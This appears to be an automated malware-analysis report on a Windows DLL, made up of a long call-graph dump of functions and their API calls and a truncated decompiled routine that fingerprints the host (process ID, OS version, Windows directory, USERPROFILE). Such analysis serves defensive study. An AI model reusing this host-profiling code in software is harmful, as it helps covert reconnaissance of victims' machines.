12843 1000cc1c 12823->12843 12825 100091e7 RtlAllocateHeap 12824->12825 12826 1000cbe2 12825->12826 12827 1000ccc1 12826->12827 12828 1000cbf4 12826->12828 12826->12843 12831 100099ec 2 API calls 12827->12831 12829 100091b2 2 API calls 12828->12829 12830 1000cbfe 12829->12830 12832 1000cc26 12830->12832 12833 1000cc08 12830->12833 12831->12843 12835 1000cc52 12832->12835 12836 1000cc2d 12832->12836 12834 10009e2e 2 API calls 12833->12834 12838 1000cc11 12834->12838 12837 100091b2 2 API calls 12835->12837 12839 100098c2 2 API calls 12836->12839 12840 1000cc5c 12837->12840 12841 10009203 2 API calls 12838->12841 12845 1000cc32 12839->12845 12842 1000984f RtlAllocateHeap 12840->12842 12841->12843 12844 1000cc66 12842->12844 12843->12710 12846 10009e2e 2 API calls 12844->12846 12848 100099ec 2 API calls 12845->12848 12847 1000cc74 12846->12847 12847->12845 12850 1000cc7a 12847->12850 12849 1000cca6 12848->12849 12851 10009e2e 2 API calls 12849->12851 12852 10009203 2 API calls 12850->12852 12853 1000ccb4 12851->12853 12854 1000cc85 12852->12854 12855 10009e2e 2 API calls 12853->12855 12856 10009203 2 API calls 12854->12856 12855->12843 12856->12843 12858 10010177 12857->12858 12859 100091e7 RtlAllocateHeap 12858->12859 12860 10002b4d 12858->12860 12861 100101a7 12859->12861 12860->12736 12861->12860 12862 10009203 2 API calls 12861->12862 12862->12860 12864 1000c08f 7 API calls 12863->12864 12865 1000e43e 12864->12865 12866 10009192 2 API calls 12865->12866 12867 1000e448 12866->12867 12868 10009999 2 API calls 12867->12868 12869 1000e457 12868->12869 12870 10009e14 2 API calls 12869->12870 12871 10001ae7 12870->12871 12871->12743 12871->12745 12873 10009192 2 API calls 12872->12873 12874 1000d0a0 12873->12874 12875 10014c3a 2 API calls 12874->12875 12880 1000d0d6 12875->12880 12876 1000d11a 12877 10009e14 2 API calls 12876->12877 12878 1000d129 12877->12878 12878->12760 12879 10014c3a 2 API calls 12879->12880 12880->12876 12880->12879 12882 100016ec 2 API calls 12881->12882 12883 10002bb7 12882->12883 12884 1000984f RtlAllocateHeap 12883->12884 12885 10002bc1 12884->12885 12886 10009e2e 2 API calls 12885->12886 12887 10002bcc 12886->12887 12887->12789 12889 1000a000 12888->12889 12890 1000dc3c 4 API calls 12889->12890 12891 1000a005 12890->12891 12891->12773 12893 10011377 12892->12893 12894 100113fb 12892->12894 12895 100016ec 2 API calls 12893->12895 12896 100091b2 2 API calls 12894->12896 12897 10011383 12895->12897 12898 10011405 12896->12898 12899 100091e7 RtlAllocateHeap 12897->12899 12921 1000cce7 12898->12921 12901 10011391 12899->12901 12903 10014c3a 2 API calls 12901->12903 12905 100113ab 12903->12905 12904 10009e2e 2 API calls 12907 10011421 12904->12907 12906 1000c172 2 API calls 12905->12906 12909 100113bd 12906->12909 12908 10009203 2 API calls 12907->12908 12910 100113f4 12908->12910 12911 1000c493 2 API calls 12909->12911 12910->12817 12912 100113ce 12911->12912 12913 10009e2e 2 API calls 12912->12913 12914 100113e1 12913->12914 12918 1000af40 12914->12918 12917 10009203 2 API calls 12917->12910 12930 1000af11 12918->12930 12922 100091e7 RtlAllocateHeap 12921->12922 12923 1000ccf7 12922->12923 12929 1000cd01 12923->12929 12933 1000970c 12923->12933 12928 10009203 2 API calls 12928->12929 12929->12904 12931 1000af2b 6 API calls 12930->12931 12932 1000af27 12931->12932 12932->12917 12934 1000967b 2 API calls 12933->12934 12935 10009723 12934->12935 12936 100103db 12935->12936 12937 100103ec 12936->12937 12940 100101ff 12937->12940 12941 1000cd2a 12940->12941 12942 10010219 12940->12942 12941->12928 12942->12941 12943 100091b2 RtlAllocateHeap GetNumberFormatA 12942->12943 12944 10010264 12943->12944 12945 100091e7 RtlAllocateHeap 12944->12945 12946 100102b0 12945->12946 12947 100102b9 12946->12947 12948 100102cb 12946->12948 12949 10009e2e HeapFree memset 12947->12949 12950 100091b2 RtlAllocateHeap GetNumberFormatA 12948->12950 12949->12941 12951 100102d5 12950->12951 12952 1000c172 memset _vsnwprintf 12951->12952 12953 100102ef 12952->12953 12954 1000c172 memset _vsnwprintf 12953->12954 12962 10010335 12953->12962 12956 10010314 12954->12956 12955 10009203 HeapFree memset 12957 1001035b 12955->12957 12960 1000c493 memset GetExitCodeProcess 12956->12960 12958 10009e2e HeapFree memset 12957->12958 12959 10010364 12958->12959 12961 10009e2e HeapFree memset 12959->12961 12960->12962 12961->12941 12962->12955 12966 1000e549 12963->12966 12964 1000e54d 12964->12714 12964->12715 12965 100091e7 RtlAllocateHeap 12965->12966 12966->12964 12966->12965 12968 100091e7 RtlAllocateHeap 12967->12968 12969 1000cd8e 12968->12969 12970 1000ceff 12969->12970 12971 100091e7 RtlAllocateHeap 12969->12971 12970->12269 12973 1000cda8 12971->12973 12972 1000ce0e 12974 10009203 2 API calls 12972->12974 12973->12970 12973->12972 12977 1000936a memset 12973->12977 12978 1000a14f 11 API calls 12973->12978 12975 1000cef1 12974->12975 12976 10009203 2 API calls 12975->12976 12976->12970 12977->12973 12978->12973 12988 1000ae56 12979->12988 12983 1000b2bd 12982->12983 12984 1000aaab RtlAllocateHeap 12983->12984 12986 1000b2e5 12984->12986 12985 1000b34a 12985->12283 12986->12985 12987 10009203 2 API calls 12986->12987 12987->12985 12989 1000affb 4 API calls 12988->12989 12990 1000ae75 12989->12990 12991 1000ae53 12990->12991 12992 10009203 2 API calls 12990->12992 12991->12273 12991->12284 12992->12991 12994 1000ae47 4 API calls 12993->12994 12995 1000225c 12994->12995 12996 10002267 12995->12996 12997 1000278b 3 API calls 12995->12997 13034 1000118f 12996->13034 13035 1000f6ad 12996->13035 12997->12996 13000 1000af40 6 API calls 13001 10002282 13000->13001 13040 1000eeb3 13001->13040 13004 1000c08f 7 API calls 13005 100022a0 13004->13005 13005->13034 13047 1000eb0a 13005->13047 13009 100022d9 13010 10002313 13009->13010 13011 10009559 8 API calls 13009->13011 13065 1000363a CreateMutexW 13010->13065 13013 100022fb 13011->13013 13013->13010 13016 1000ec07 6 API calls 13013->13016 13015 1000ec07 6 API calls 13017 10002328 13015->13017 13016->13010 13080 10002ead 13017->13080 13025 1000233e 13026 1000c3b5 GetSystemTimeAsFileTime 13025->13026 13028 1000236c 13025->13028 13121 10002ee8 13025->13121 13026->13025 13130 10004f45 13028->13130 13034->11816 13036 1000c3b5 GetSystemTimeAsFileTime 13035->13036 13037 1000f6b8 13036->13037 13038 1000af11 6 API calls 13037->13038 13039 10002270 13038->13039 13039->13000 13041 10009559 8 API calls 13040->13041 13042 1000eec5 13041->13042 13043 10009559 8 API calls 13042->13043 13044 1000eede 13043->13044 13146 1000ee3f 13044->13146 13046 10002289 13046->13004 13048 1000eb1b 13047->13048 13049 100022cb 13048->13049 13050 100091e7 RtlAllocateHeap 13048->13050 13051 1000ec07 13049->13051 13050->13049 13053 1000ec25 13051->13053 13052 1000ec7d 13054 100091e7 RtlAllocateHeap 13052->13054 13055 1000ec8e 13052->13055 13053->13052 13061 1000ec29 13053->13061 13159 1000eb5d 13053->13159 13054->13055 13056 1000e920 2 API calls 13055->13056 13055->13061 13058 1000ecf3 13056->13058 13059 1000ed69 SetThreadPriority 13058->13059 13060 1000ed2e 13058->13060 13059->13061 13062 1000ed52 13060->13062 13063 10009203 2 API calls 13060->13063 13061->13009 13064 1000936a memset 13062->13064 13063->13062 13064->13061 13066 10003653 CreateMutexW 13065->13066 13076 1000231a 13065->13076 13067 10003665 13066->13067 13066->13076 13068 100016d2 2 API calls 13067->13068 13069 1000366f 13068->13069 13070 1000980b RtlAllocateHeap 13069->13070 13069->13076 13071 1000367d 13070->13071 13072 10009e14 2 API calls 13071->13072 13073 1000368b 13072->13073 13074 100091e7 RtlAllocateHeap 13073->13074 13075 10003695 13074->13075 13075->13076 13077 100091e7 RtlAllocateHeap 13075->13077 13076->13015 13078 100036b8 13077->13078 13078->13076 13165 10007a2d 13078->13165 13081 1000232f 13080->13081 13082 10002ebb 13080->13082 13084 10005a78 13081->13084 13169 1000de25 13082->13169 13085 1000e42c 8 API calls 13084->13085 13086 10005a93 13085->13086 13087 10002334 13086->13087 13088 100091e7 RtlAllocateHeap 13086->13088 13097 100030de 13087->13097 13089 10005ab0 13088->13089 13096 10005aba 13089->13096 13176 1000e1a0 13089->13176 13091 10009203 2 API calls 13091->13087 13095 1000ec07 6 API calls 13095->13096 13096->13091 13098 1000ae47 4 API calls 13097->13098 13099 100030fc 13098->13099 13189 10003028 13099->13189 13102 10003028 3 API calls 13103 10003126 13102->13103 13193 1000ae93 13103->13193 13106 10002339 13114 10004dbd 13106->13114 13107 10009ac5 RtlAllocateHeap 13108 10003149 13107->13108 13109 10003165 13108->13109 13196 10003181 13108->13196 13111 10009bbe 2 API calls 13109->13111 13112 10003170 13111->13112 13113 10009203 2 API calls 13112->13113 13113->13106 13203 10005368 13114->13203 13116 10004de0 13117 10004deb 13116->13117 13118 10004e4d 13116->13118 13223 10004972 13116->13223 13117->13025 13268 100048a6 13118->13268 13122 10003023 13121->13122 13123 10002f1d 13121->13123 13122->13025 13123->13122 13124 1000301a 13123->13124 13127 100091e7 RtlAllocateHeap 13123->13127 13129 10009203 2 API calls 13123->13129 13304 1000b353 13123->13304 13309 10005e24 13123->13309 13124->13122 13313 10003218 13124->13313 13127->13123 13129->13123 13132 10004f53 13130->13132 13131 10004f81 13133 10009203 2 API calls 13131->13133 13132->13131 13334 10004e5f 13132->13334 13134 10002371 13133->13134 13136 1000edf7 13134->13136 13137 1000edfd 13136->13137 13139 1000ee1b 13137->13139 13348 1000eda3 13137->13348 13140 10009203 2 API calls 13139->13140 13141 10002376 13140->13141 13142 10005de9 13141->13142 13143 10005df2 13142->13143 13144 10005e17 13143->13144 13145 10009203 2 API calls 13143->13145 13144->13034 13145->13144 13147 1000ee89 13146->13147 13148 1000ee4d 13146->13148 13149 10009192 2 API calls 13147->13149 13150 100091e7 RtlAllocateHeap 13148->13150 13151 1000ee93 13149->13151 13152 1000ee5e 13150->13152 13153 1000980b RtlAllocateHeap 13151->13153 13155 1000eeac 13152->13155 13157 10009203 2 API calls 13152->13157 13154 1000ee9e 13153->13154 13156 10009e14 2 API calls 13154->13156 13155->13046 13156->13155 13158 1000ee82 13157->13158 13158->13046 13160 1000eb67 13159->13160 13161 1000eb8c 13160->13161 13162 10009203 2 API calls 13160->13162 13163 1000eba2 13160->13163 13164 1000936a memset 13161->13164 13162->13161 13163->13053 13164->13163 13166 10007a32 13165->13166 13167 10009559 8 API calls 13166->13167 13168 10007a44 13167->13168 13168->13076 13170 1000de3c 13169->13170 13171 100091b2 2 API calls 13170->13171 13175 1000de5b 13170->13175 13172 1000de6a lstrcmpiW 13171->13172 13173 1000de80 13172->13173 13174 10009e2e 2 API calls 13173->13174 13174->13175 13175->13081 13184 1000e015 13176->13184 13179 1000df7f 13180 100091b2 2 API calls 13179->13180 13183 1000dfa5 13180->13183 13181 10009e2e 2 API calls 13182 10005b14 13181->13182 13182->13095 13183->13181 13185 1000936a memset 13184->13185 13186 1000e04c 13185->13186 13187 10005ac6 13186->13187 13188 1000e106 LocalAlloc 13186->13188 13187->13096 13187->13179 13188->13187 13190 10003049 13189->13190 13191 10003032 13189->13191 13190->13102 13192 10009281 3 API calls 13191->13192 13192->13190 13200 1000ae9d 13193->13200 13197 1000318d 13196->13197 13198 10003198 atol 13197->13198 13199 10003193 13197->13199 13198->13199 13199->13108 13201 1000affb 4 API calls 13200->13201 13202 10003131 13201->13202 13202->13106 13202->13107 13204 1000538a 13203->13204 13274 10004811 13204->13274 13207 1000f9a8 4 API calls 13208 100053b5 13207->13208 13209 1000facb 3 API calls 13208->13209 13214 100053c0 13208->13214 13210 100053dc 13209->13210 13210->13214 13215 100091e7 RtlAllocateHeap 13210->13215 13211 100055c0 13213 10009203 2 API calls 13211->13213 13212 1000fcfb 6 API calls 13212->13211 13216 100055cb 13213->13216 13214->13211 13214->13212 13220 1000542a 13215->13220 13216->13116 13217 1000557f 13217->13214 13219 10009203 2 API calls 13217->13219 13218 10009ac5 RtlAllocateHeap 13218->13220 13219->13214 13220->13214 13220->13217 13220->13218 13221 10009252 RtlAllocateHeap 13220->13221 13222 10009bbe HeapFree memset 13220->13222 13221->13220 13222->13220 13224 1000498c 13223->13224 13280 1001059c 13224->13280 13227 10004a79 13230 1000a650 4 API calls 13227->13230 13228 100049cf 13229 100091e7 RtlAllocateHeap 13228->13229 13231 100049d6 13229->13231 13232 10004a91 13230->13232 13233 100049e0 13231->13233 13234 10004a05 13231->13234 13235 10004a9a 13232->13235 13236 10004abc 13232->13236 13240 10009203 2 API calls 13233->13240 13241 10004a50 13234->13241 13245 10004a6e 13234->13245 13238 10009203 2 API calls 13235->13238 13237 1000ae47 4 API calls 13236->13237 13239 10004ad1 13237->13239 13252 100049a6 13238->13252 13242 1000a41e 9 API calls 13239->13242 13240->13252 13243 10009203 2 API calls 13241->13243 13247 10004af8 13242->13247 13243->13252 13244 1000a455 3 API calls 13253 10004c9e 13244->13253 13246 10009281 3 API calls 13245->13246 13245->13252 13246->13252 13248 1000936a memset 13247->13248 13263 10004b83 13247->13263 13266 10004b47 13248->13266 13249 10004cc8 13251 10009203 2 API calls 13249->13251 13250 10009203 2 API calls 13250->13253 13254 10004cd8 13251->13254 13252->13116 13253->13249 13253->13250 13255 10004ce0 13254->13255 13256 10004d05 13254->13256 13260 10009203 2 API calls 13255->13260 13258 10009203 2 API calls 13256->13258 13257 1000e23e 6 API calls 13257->13266 13258->13245 13259 1000cb78 2 API calls 13259->13266 13260->13252 13261 1000caf3 3 API calls 13261->13266 13262 1000a93e 14 API calls 13262->13266 13263->13244 13264 1000aa38 10 API calls 13264->13266 13266->13257 13266->13259 13266->13261 13266->13262 13266->13263 13266->13264 13267 1000af40 6 API calls 13266->13267 13286 1000490b 13266->13286 13267->13266 13269 100048b7 13268->13269 13270 100048f8 13269->13270 13272 10009203 2 API calls 13269->13272 13271 10009203 2 API calls 13270->13271 13273 10004907 13271->13273 13272->13269 13273->13117 13275 1000483b 13274->13275 13276 1000970c 2 API calls 13275->13276 13277 1000486f 13276->13277 13278 100099ec 2 API calls 13277->13278 13279 1000489b 13278->13279 13279->13207 13281 100105b2 13280->13281 13282 100091e7 RtlAllocateHeap 13281->13282 13284 100105bd 13282->13284 13283 1000499d 13283->13227 13283->13228 13283->13252 13284->13283 13285 1001064c memcpy 13284->13285 13285->13284 13293 10009886 13286->13293 13290 10004941 13291 10009203 2 API calls 13290->13291 13292 10004953 13291->13292 13292->13266 13294 10004929 GetProcessId 13293->13294 13295 1000988f 13293->13295 13299 1000c0e0 13294->13299 13296 100091e7 RtlAllocateHeap 13295->13296 13297 100098a0 13296->13297 13297->13294 13298 100098a7 WideCharToMultiByte 13297->13298 13298->13294 13300 1000c133 2 API calls 13299->13300 13301 1000c106 13300->13301 13302 1000c112 CharUpperBuffA 13301->13302 13303 1000c130 13302->13303 13303->13290 13323 1000adf8 13304->13323 13307 1000c3b5 GetSystemTimeAsFileTime 13308 1000b37b 13307->13308 13308->13123 13310 10005e64 13309->13310 13311 10005e3b 13309->13311 13310->13123 13311->13310 13312 1000ec07 6 API calls 13311->13312 13312->13310 13314 100091e7 RtlAllocateHeap 13313->13314 13318 10003233 13314->13318 13315 100032af 13331 1000af6c 13315->13331 13318->13315 13320 10003265 lstrcatA 13318->13320 13321 1000323d 13318->13321 13322 1000c133 2 API calls 13318->13322 13319 10009203 2 API calls 13319->13321 13320->13318 13321->13122 13322->13318 13326 1000ae02 13323->13326 13327 1000affb 4 API calls 13326->13327 13328 1000ae23 13327->13328 13329 1000ae00 13328->13329 13330 10009203 2 API calls 13328->13330 13329->13307 13329->13308 13330->13329 13332 1000af7e 6 API calls 13331->13332 13333 100032b9 13332->13333 13333->13319 13339 1000438c 13334->13339 13336 10004e80 13336->13132 13337 10009203 2 API calls 13337->13336 13338 10004e76 13338->13336 13338->13337 13340 100091e7 RtlAllocateHeap 13339->13340 13341 10004398 13340->13341 13342 100043a2 13341->13342 13343 100016d2 2 API calls 13341->13343 13342->13338 13344 100043b0 13343->13344 13345 1000c133 2 API calls 13344->13345 13346 100043c6 13345->13346 13347 10009e14 2 API calls 13346->13347 13347->13342 13349 1000edf2 13348->13349 13351 1000edab 13348->13351 13349->13137 13350 1000edba 13350->13137 13351->13350 13352 1000eb5d 2 API calls 13351->13352 13353 1000edee 13352->13353 13353->13137 13354 10001015 13355 1000102b 13354->13355 13357 1000106e 13354->13357 13374 100091d2 HeapCreate 13355->13374 13358 10001030 13375 100095ad 13358->13375 13363 100091b2 2 API calls 13364 10001055 GetFileAttributesW 13363->13364 13365 10001076 13364->13365 13366 10001068 13364->13366 13367 10009e2e 2 API calls 13365->13367 13368 10009e2e 2 API calls 13366->13368 13369 1000107e 13367->13369 13368->13357 13370 10001084 memset memset MultiByteToWideChar 13369->13370 13370->13370 13371 100010e5 13370->13371 13372 10009559 8 API calls 13371->13372 13373 100010f9 GetPEB 13372->13373 13373->13357 13374->13358 13376 100091e7 RtlAllocateHeap 13375->13376 13377 10001035 13376->13377 13378 1001443b 13377->13378 13380 10014453 13378->13380 13379 10009252 RtlAllocateHeap 13381 10001049 13379->13381 13380->13379 13381->13363 14712 100013be 14725 100091d2 HeapCreate 14712->14725 14714 100013ce 14715 100095ad RtlAllocateHeap 14714->14715 14716 100013d3 14715->14716 14717 100015d4 8 API calls 14716->14717 14718 100013dd 14717->14718 14726 1000b986 14718->14726 14722 100013f6 14723 100012f8 72 API calls 14722->14723 14724 100013fb 14723->14724 14725->14714 14727 1000b99d 14726->14727 14728 1000dd17 7 API calls 14727->14728 14729 1000b9a4 14728->14729 14730 1000936a memset 14729->14730 14731 1000b9f3 GetVersionExA GetCurrentProcessId 14730->14731 14732 1000e64f RtlAllocateHeap 14731->14732 14733 1000ba10 14732->14733 14734 1000e68a RtlAllocateHeap 14733->14734 14735 100013e2 14734->14735 14736 1000a916 14735->14736 14737 1000c08f 7 API calls 14736->14737 14738 1000a932 14737->14738 14738->14722

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                                                            			E1000BC31(void* __edx, void* __fp0) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                                                                            				char _v144;
                                                                                                                                                                                                                                                                            				char _v656;
                                                                                                                                                                                                                                                                            				char _v668;
                                                                                                                                                                                                                                                                            				char _v2644;
                                                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA* _t70;
                                                                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                                                            				intOrPtr* _t79;
                                                                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                                                                            				intOrPtr _t91;
                                                                                                                                                                                                                                                                            				void* _t92;
                                                                                                                                                                                                                                                                            				intOrPtr _t94;
                                                                                                                                                                                                                                                                            				intOrPtr _t95;
                                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                                                                                                                            				intOrPtr _t104;
                                                                                                                                                                                                                                                                            				short _t109;
                                                                                                                                                                                                                                                                            				char _t111;
                                                                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                                                                            				intOrPtr _t137;
                                                                                                                                                                                                                                                                            				intOrPtr _t139;
                                                                                                                                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                                                                                                                                            				intOrPtr _t144;
                                                                                                                                                                                                                                                                            				intOrPtr _t146;
                                                                                                                                                                                                                                                                            				intOrPtr _t152;
                                                                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                                                                            				WCHAR* _t154;
                                                                                                                                                                                                                                                                            				char* _t155;
                                                                                                                                                                                                                                                                            				intOrPtr _t166;
                                                                                                                                                                                                                                                                            				intOrPtr _t182;
                                                                                                                                                                                                                                                                            				void* _t198;
                                                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA* _t199;
                                                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                                                            				void* _t202;
                                                                                                                                                                                                                                                                            				char _t205;
                                                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                                                            				char* _t207;
                                                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                                                            				int* _t211;
                                                                                                                                                                                                                                                                            				void* _t224;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t224 = __fp0;
                                                                                                                                                                                                                                                                            				_t152 =  *0x10020fa8; // 0x10000000
                                                                                                                                                                                                                                                                            				_t70 = E100091E7(0x1ac4);
                                                                                                                                                                                                                                                                            				_t199 = _t70;
                                                                                                                                                                                                                                                                            				if(_t199 != 0) {
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                                                                                                            					_t72 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t73 =  *((intOrPtr*)(_t72 + 0xb0))(_t200);
                                                                                                                                                                                                                                                                            					_t3 = _t199 + 0x648; // 0x648
                                                                                                                                                                                                                                                                            					E10014B0E( *((intOrPtr*)(_t199 + 0x1640)) + _t73, _t3);
                                                                                                                                                                                                                                                                            					_t75 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t5 = _t199 + 0x1644; // 0x1644
                                                                                                                                                                                                                                                                            					_t201 = _t5;
                                                                                                                                                                                                                                                                            					_push(0x105);
                                                                                                                                                                                                                                                                            					_push(_t5);
                                                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t75 + 0x12c))() != 0) {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t199 + 0x1854)) = E1000960F(_t201);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t77 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t79 = E1000DD17( *((intOrPtr*)(_t77 + 0x130))()); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x110)) = _t79;
                                                                                                                                                                                                                                                                            					_t163 =  *_t79;
                                                                                                                                                                                                                                                                            					if(E1000DE92( *_t79) == 0) {
                                                                                                                                                                                                                                                                            						_t81 = E1000DD67(_t163, _t201); // executed
                                                                                                                                                                                                                                                                            						__eflags = _t81;
                                                                                                                                                                                                                                                                            						_t166 = (0 | _t81 > 0x00000000) + 1;
                                                                                                                                                                                                                                                                            						__eflags = _t166;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t199 + 0x214)) = _t166;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t199 + 0x214)) = 3;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t14 = _t199 + 0x220; // 0x220, executed
                                                                                                                                                                                                                                                                            					_t82 = E1000E68A(_t14); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x218)) = _t82;
                                                                                                                                                                                                                                                                            					_t83 = E1000E64F(_t14); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x21c)) = _t83;
                                                                                                                                                                                                                                                                            					_t17 = _t199 + 0x114; // 0x114
                                                                                                                                                                                                                                                                            					_t202 = _t17;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x224)) = _t152;
                                                                                                                                                                                                                                                                            					_push( &_v16);
                                                                                                                                                                                                                                                                            					_v12 = 0x80;
                                                                                                                                                                                                                                                                            					_push( &_v8);
                                                                                                                                                                                                                                                                            					_v8 = 0x100;
                                                                                                                                                                                                                                                                            					_push( &_v656);
                                                                                                                                                                                                                                                                            					_push( &_v12);
                                                                                                                                                                                                                                                                            					_push(_t202);
                                                                                                                                                                                                                                                                            					_push( *((intOrPtr*)( *((intOrPtr*)(_t199 + 0x110)))));
                                                                                                                                                                                                                                                                            					_t89 =  *0x10020fc8; // 0x466fb00
                                                                                                                                                                                                                                                                            					_push(0); // executed
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t89 + 0x6c))() == 0) {
                                                                                                                                                                                                                                                                            						GetLastError();
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t91 =  *0x10020fc0; // 0x466fa38
                                                                                                                                                                                                                                                                            					_t92 =  *((intOrPtr*)(_t91 + 0x3c))(0x1000);
                                                                                                                                                                                                                                                                            					_t28 = _t199 + 0x228; // 0x228
                                                                                                                                                                                                                                                                            					_t153 = _t28;
                                                                                                                                                                                                                                                                            					 *(_t199 + 0x1850) = 0 | _t92 > 0x00000000;
                                                                                                                                                                                                                                                                            					if( *0x10020fa4 != 2) {
                                                                                                                                                                                                                                                                            						E1000BB3A( *((intOrPtr*)(_t199 + 0x224)), _t153);
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						E1000BC04(_t153);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t94 =  *0x10020fa4; // 0x1
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0xa0)) = _t94;
                                                                                                                                                                                                                                                                            					_t219 = _t153;
                                                                                                                                                                                                                                                                            					if(_t153 != 0) {
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t199 + 0x434)) = E1000960F(_t153);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t95 = E1000D214();
                                                                                                                                                                                                                                                                            					_t35 = _t199 + 0xb0; // 0xb0
                                                                                                                                                                                                                                                                            					_t203 = _t35;
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0xac)) = _t95;
                                                                                                                                                                                                                                                                            					_t96 = E1000D001(_t35, _t219, _t224);
                                                                                                                                                                                                                                                                            					_t37 = _t199 + 0xd0; // 0xd0
                                                                                                                                                                                                                                                                            					E10009971(_t96, _t35, _t37);
                                                                                                                                                                                                                                                                            					_t38 = _t199 + 0x438; // 0x438
                                                                                                                                                                                                                                                                            					E10009626(_t153, _t38);
                                                                                                                                                                                                                                                                            					_t100 = E1000E6E9(_t203, E1000CF09(_t35), 0);
                                                                                                                                                                                                                                                                            					_t39 = _t199 + 0x100c; // 0x100c
                                                                                                                                                                                                                                                                            					E1000D22A(_t100, _t39, _t224);
                                                                                                                                                                                                                                                                            					_t102 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t104 = E1000DEE4( *((intOrPtr*)(_t102 + 0x130))(_t202)); // executed
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0x101c)) = _t104;
                                                                                                                                                                                                                                                                            					E1000936A(_t199, 0, 0x9c);
                                                                                                                                                                                                                                                                            					_t211 = _t210 + 0xc;
                                                                                                                                                                                                                                                                            					_t199->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                            					GetVersionExA(_t199);
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 0xa8)) = E1000B93E(_t103);
                                                                                                                                                                                                                                                                            					_t109 = E1000B967(_t108);
                                                                                                                                                                                                                                                                            					_t43 = _t199 + 0x1020; // 0x1020
                                                                                                                                                                                                                                                                            					_t154 = _t43;
                                                                                                                                                                                                                                                                            					 *((short*)(_t199 + 0x9c)) = _t109;
                                                                                                                                                                                                                                                                            					GetWindowsDirectoryW(_t154, 0x104);
                                                                                                                                                                                                                                                                            					_t111 = E100091B2(_t108, 0x83);
                                                                                                                                                                                                                                                                            					_t182 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t205 = _t111;
                                                                                                                                                                                                                                                                            					 *_t211 = 0x104;
                                                                                                                                                                                                                                                                            					_push( &_v668);
                                                                                                                                                                                                                                                                            					_push(_t205);
                                                                                                                                                                                                                                                                            					_v8 = _t205;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t182 + 0xf0))() == 0) {
                                                                                                                                                                                                                                                                            						_t146 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t146 + 0x10c))(_t205, _t154);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					E10009E2E( &_v8);
                                                                                                                                                                                                                                                                            					_t116 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            					_t50 = _t199 + 0x1434; // 0x1434
                                                                                                                                                                                                                                                                            					_t206 = _t50;
                                                                                                                                                                                                                                                                            					 *_t211 = 0x209;
                                                                                                                                                                                                                                                                            					_push(_t206);
                                                                                                                                                                                                                                                                            					_push(L"USERPROFILE");
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t116 + 0xf0))() == 0) {
                                                                                                                                                                                                                                                                            						E1000C172(_t206, 0x105, L"%s\\%s", _t154);
                                                                                                                                                                                                                                                                            						_t144 =  *0x10020fa0; // 0x466f8a0
                                                                                                                                                                                                                                                                            						_t211 =  &(_t211[5]);
